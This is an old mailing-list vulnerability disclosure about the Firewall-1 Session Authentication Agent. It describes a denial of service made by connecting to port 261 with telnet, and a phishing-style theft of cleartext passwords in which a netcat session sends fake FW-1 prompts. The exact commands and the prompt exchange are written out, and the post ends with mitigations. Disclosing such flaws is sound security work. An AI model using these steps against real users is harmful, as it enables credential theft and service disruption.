Firewall-1 Session Agent, DOS and password thief

[gregory duchemin <c3rb3r () HOTMAIL COM>]

hi,

after the great revelations at the las vegas black hat about many security
vulnerabilities in firewall-1, i was looking at this little module i use in
my compagny and called "authentication session agent".
We use it all over the corporate network to allow only some priviledged
users to go into Internet.
This agent is installed on the windows 9.x NT box et just listen the 261
port for a connexion from a firewall module.
When a user wish to surf on the web or to use any other outside service, the
firewall intercept the request and three handschack the agent to get some
authentication informations: user + pass

there are at least two vulnerabilities in the agent:

1- Denial of service, when a connexion is already established with the
agent, no connexion can be carried anymore leading in a denial of service
and, if one day some malicious users decide to type something like :

#telnet target 261

User of the target couldn't be able to get the requester asking him for his
password....too bad...no more authentication, no more outside connexion


2- more seriously, for compatibility reason the agent show a checkbox that
permit our user to send his password in a cleartext way because firewall
modules 4.0 and below don't know how to do encryption.
It's not only possible to sniff this password on the network segment but
much interresting, it 's really trivial to ask the user agent for giving it
to us ;)

example:

#nc target 261

220 FW-1 fake session authentication
331 User:
-> he answer with his username
331 *FireWall-1 p4ssw0rd pleazzz:
-> if he's an idiot, he 'll take that for a real fw prompt and u 'll get
back his password else just change the message ;)
200 User has now a clone, c3rb3r
230 OK

Note that this exploit is interactive, when u send 331 User:, it appears
straight away on the victim screen and so u should have to wait for his
answer.
It's even possible to use session agent like a funny chat with a checkpoint
logo on the right top ;) try it...

Solutions:
For the DOS, wait for checkpoint reply but for the password weakness always
use encryption ( if you have a firewall module 4.1 naturally )
and use IP wrapper incorporated into the agent but not effective by default.

that was my small contribution to checkpoint's black list

OOpsss: agent 4.1 was tested on a win95 box.


Have a nice day
Greg

===================================================
Gregory Duchemin // security engineer

NEUROCOM CANADA
1001 Bd Maisonneuve
Montreal Quebec
CANADA
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com